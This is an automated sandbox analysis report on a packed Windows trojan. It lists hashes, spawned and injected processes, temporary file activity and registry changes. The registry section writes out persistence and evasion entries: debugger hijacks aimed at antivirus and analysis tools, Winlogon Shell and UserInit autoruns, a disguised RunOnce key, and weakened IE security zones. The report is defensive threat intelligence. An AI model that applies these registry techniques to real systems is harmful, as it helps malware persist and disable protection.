Trojan.Win32.Diple.geej (Kaspersky), Trojan.GenericKD.2398642 (B) (Emsisoft), Trojan.GenericKD.2398642 (AdAware), Installer.Win32.SmartIM.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Installer
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 56c3c75ea1bd95583aa4975ee6bfef79
SHA1: 38b156ed27a86520a47563b6aee73b5b84ddf059
SHA256: 73ed0ab961822dfaf4d9093fe131fc6e56710f6ae7443c280dd69f50bc111540
SSDeep: 49152:05obz83bF2EQTxV05MTw7ZlSkPkVgtEjn t8Y YxEj5rAL KnodsMU:2ob4ryV0dykPIFaK xEja70U
Size: 2580480 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, UPolyXv05_v6
Company: no certificate found
Created at: 2015-05-10 19:12:59
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
mswindows.exe:436
b09bbc0c.exe:212
csc.exe:2616
csc.exe:3560
csc.exe:4040
csc.exe:3144
csc.exe:2456
csc.exe:3324
csc.exe:1936
csc.exe:2696
bch_h8mn.exe:2760
honmznj1.exe:3400
%original file name%.exe:1780
%original file name%.exe:580
ping.exe:2120
ping.exe:268
ping.exe:3496
ping.exe:2840
ping.exe:2948
ping.exe:2792
ping.exe:2504
ping.exe:3720
ping.exe:500
cvtres.exe:4056
cvtres.exe:3204
cvtres.exe:2624
cvtres.exe:3340
cvtres.exe:3608
cvtres.exe:2468
cvtres.exe:244
cvtres.exe:2748
system.exe:3452
system.exe:2308
system.exe:4032
system.exe:2688
system.exe:3312
system.exe:2796
system.exe:376
qrv670kf.exe:3256
qkjdmucq.exe:2752
FB_1.tmp.exe:1452
xvnsxkn9.exe:2036
6g4zx02q.exe:3644
The Trojan injects its code into the following process(es):
FB_2.tmp.exe:612
cgjrsnhu.exe:2480
system.exe:2448
DW20.EXE:2548
svchost.exe:3856
ping.exe:3908
wmiprvse.exe:228
Explorer.EXE:532
services.exe:724
svchost.exe:904
svchost.exe:988
svchost.exe:1084
svchost.exe:1128
svchost.exe:1180
spoolsv.exe:1424
jqs.exe:1640
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process FB_2.tmp.exe:612 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\4.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\7.tmp (6 bytes)
The process mswindows.exe:436 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\system.exe (17178 bytes)
%System%\clientsvr.exe (2105 bytes)
The Trojan deletes the following file(s):
%System%\clientsvr.exe (0 bytes)
The process csc.exe:2616 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\qkjdmucq.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC16.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qkjdmucq.exe (5120 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC16.tmp (0 bytes)
The process csc.exe:3560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\6g4zx02q.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6g4zx02q.exe (5120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCB.tmp (652 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RESC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCB.tmp (0 bytes)
The process csc.exe:4040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCE.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.exe (4408 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSCE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RESF.tmp (0 bytes)
The process csc.exe:3144 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\qrv670kf.exe (5120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qrv670kf.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC19.tmp (652 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC19.tmp (0 bytes)
The process csc.exe:2456 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC14.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.exe (4408 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES15.tmp (0 bytes)
The process csc.exe:3324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC8.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.exe (4408 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES9.tmp (0 bytes)
The process csc.exe:1936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\b09bbc0c.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\b09bbc0c.exe (5120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC11.tmp (652 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES12.tmp (0 bytes)
The process csc.exe:2696 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC4.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.exe (4408 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC4.tmp (0 bytes)
The process %original file name%.exe:1780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\FB_1.tmp.exe (1655 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FB_2.tmp.exe (9606 bytes)
The process cvtres.exe:4056 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RESF.tmp (2912 bytes)
The process cvtres.exe:3204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES1A.tmp (2920 bytes)
The process cvtres.exe:2624 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES17.tmp (2920 bytes)
The process cvtres.exe:3340 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES9.tmp (2912 bytes)
The process cvtres.exe:3608 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RESC.tmp (2912 bytes)
The process cvtres.exe:2468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES15.tmp (2920 bytes)
The process cvtres.exe:244 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES12.tmp (2920 bytes)
The process cvtres.exe:2748 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES5.tmp (2912 bytes)
The process system.exe:3452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.out (316 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.cmdline (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.0.cs (230 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.0.cs (0 bytes)
The process system.exe:2308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.out (316 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.cmdline (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.0.cs (230 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.0.cs (0 bytes)
The process system.exe:2688 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The process system.exe:2796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.out (316 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.cmdline (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.0.cs (230 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.0.cs (0 bytes)
The process system.exe:376 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.out (316 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.cmdline (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.0.cs (229 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.tmp (0 bytes)
The process FB_1.tmp.exe:1452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\clientsvr.exe (2105 bytes)
Registry activity
The process FB_2.tmp.exe:612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B CA 0D 35 E9 AB 51 72 07 C8 BE 0F F8 08 82 09"
The process mswindows.exe:436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ComboFix.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.EXE]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software]
"CyZOhdvIE8wuzICtz4cp g==" = "bbhPUfzhVVTW88hp3qZqjUwHiHepYvaGqjBFQBhKKL/rBpjPibZJSs9YGLDrJqrbUCpVJi516e09W/ltfDEs5LrqQlJeAYI4uIKK87D7wsA="
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software]
"mImSgnjCHK/JIKrA/Sgt9Q==" = "f8sBVZHgbonlES5/kO10xA=="
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"system.exe" = "mIRC"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgidsagent.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamscheduler.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamservice.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgwdsvc.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avconfig.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software]
"MTX" = "e45b0a7574b2e3981138c55b46daa7852d30cbd7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spybotsd.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbampt.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccuac.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGNT.EXE]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netstat.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastUI.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software]
"qHuPqQiPOxjdEJg/yoZUow==" = "5uXOOzzyHhoW9NL Y0wcLQ=="
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software]
"y0PrE0Xk6OACjiGOJ3nrlg==" = "sJvJzeJRtfjV4luQlEDvigWDsplPslvWun8l9KiqtUZjAZ7QVNExZyv 0 nFcrYvtN2OC4l8Yj22g6Oy9/bdD5F6ws0eWh8zYY6po276 tBoO19I8Lbix97Mb1V2NywyjaPq98N97r5dvjX66ZP94NYhU1g7ZwOksWpqFUY16nQI6ut2HU5Fl02FVfoQMpkU1GZrVg0EaCBrmV/NjTqeN9hEAQoecwOq9QVmi 71FuMzy3e emkLppVQWLIF0CrTvEKfjE5jvgj38myJqnwXvGvPK/Oeh7KpyjJP059LhofeI9AP UoPxG24bDnjCbGt462D8/IYXrNn9dMAB 2SXq0SEnXcXhDMP/4gJBZZcYfR1mBM5QIkmmzl91yuC0HzJkMT F2vqqlJ/FnAzkAs/9l/nFAeqkIeGqlNeaGU9iKUTcBzu9U3TaXzevAT80W3XwjKsj4hyuwbGLrwv1XWY3nG3z97H5JjGCf f0wnVj0ACoMNjyFxoqXISwc5409J1tQn0Fc/9lRK74S7b7Ntt0zmHGcCCQ7VFWG6aCO6CPTXN00Sr9CAxjPPdgfYPj9XwcAmYNsWPKCTycyvA/TXVSRWzsmR/9L geNxhdCTh89Fh hIGNLHEM 7GZfIBzyf7tG2SrjimJN0bMXoyDPJ/DCv7JIZM1tdZCW2ujO0oBqyj7x0tMah60O7Upk EQhnX2VUjQSJixUHpaiWVPkbjtcJp2hTUZqPfJWuCB4oHkrgqNMZK3E2jdYVzy944ok5zWwoP1AhIu2QZaGCGOvwObJHr36aQy5c0xlq4FLp3H 7KGHss3CSTL10TGRWoXW70bA0eZSdOLEdPL2v6VpXgYJt5McY1kLAnYzM5MmSYAU="
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDFiles.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software]
"pth" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\blindman.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcsrvx.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastSvc.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software]
"prc" = "436"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDMain.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDWinSec.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 E7 2A 0F 3E 3D B7 7D 05 41 F6 11 D6 FD 53 A1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zlclient.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrsx.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\keyscrambler.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdagent.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software]
"1J/pfMWJhoYDlxlyE7IkK3gErIiNMdjannxwWJULzCY=" = " dXC Tqmj3zuI42NM6Ip7oqKKu3Fg6RMxyg3zMY46FYtyTfyHfOusJ4JKCKOcPCm"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software]
"MaWoUY3t8JlzDMSqcKJ92w==" = "vr5KwDkNaHP9u1AiwvWLdYGV2Z2KFYavO0rrSNCXOm8I8nWKPuAdU6EUpB1u0lbj uJ2EH81go/pTDuDMqnhoR8YkXvOw0WUoGT8967wx3azscKnAQbneGH53faEKRRELn7XYCzxz75NbpwL1F4IvlbM9eE2XjNalLE/666Aw5W rlxFlbBt 5CDusyDcgiiV99 Clk594tYguDP9/0zdSTFSdvW4 ZwCiRs4kwbSNfvdAB4xIGmlhyDcVqoJgghL/Ila3JqPb0xygW4SOIhgu2iDMEXivenj1P X8q1CPaE J/uwFfYsT8iNO7Ymq5L3k5V68k72YIA4dtuF2KmcETumd3WjjX5 Ucz7QeMPvOEmtecxZ3Kbr1keb2kX1fbU4bHszxncxxIuPA61Dba9wzddzzMR2r4F0V3/20D23RSkhTCEmTWFIIMfN64Zfq7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\instup.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe]
"debugger" = "D:\375569\mswindows.exe"
The Trojan adds the reference to itself to be executed when a user logs on:
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,D:\375569\mswindows.exe"
The Trojan modifies IE security-zone settings so that all local web nodes with no dots in their name, which are not assigned to any zone, are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan adds the reference to itself to be executed when a user logs on:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"UserInit" = "userinit.exe,%System%\clientsvr.exe"
The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"MSUpdate" = "D:\375569\mswindows.exe"
The process b09bbc0c.exe:212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 99 38 2B 9E 54 00 A3 A2 C8 FE 30 6B 5E F5 47"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE security-zone settings so that all local web nodes with no dots in their name, which are not assigned to any zone, are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process csc.exe:2616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE A8 A4 4B 14 19 8B 36 68 43 CC 21 F8 25 41 32"
The process csc.exe:3560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE 35 04 50 7C FD AB 83 B7 77 54 18 47 AB D4 35"
The process csc.exe:4040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D 18 29 DD 38 83 94 69 2B E3 14 E5 AD 11 00 7D"
The process csc.exe:3144 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 0A D0 BA D0 B5 BB EF C7 EA 77 31 CC 8F 34 C0"
The process csc.exe:2456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B FC C5 B6 FF F6 28 D4 21 53 45 20 2A 54 F9 D1"
The process csc.exe:3324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 0F 45 DC B7 65 15 62 EF E9 04 EB 5C 10 B4 43"
The process csc.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E 2C 49 58 0E C7 0C 9A 48 E4 04 C3 39 6C C8 0A"
The process csc.exe:2696 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E D0 B5 C1 B4 70 EE EF 16 FC 08 63 4B 83 E8 D6"
The process bch_h8mn.exe:2760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 BC B2 82 3C FC FE B1 B8 96 9F B1 12 B2 B2 97"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
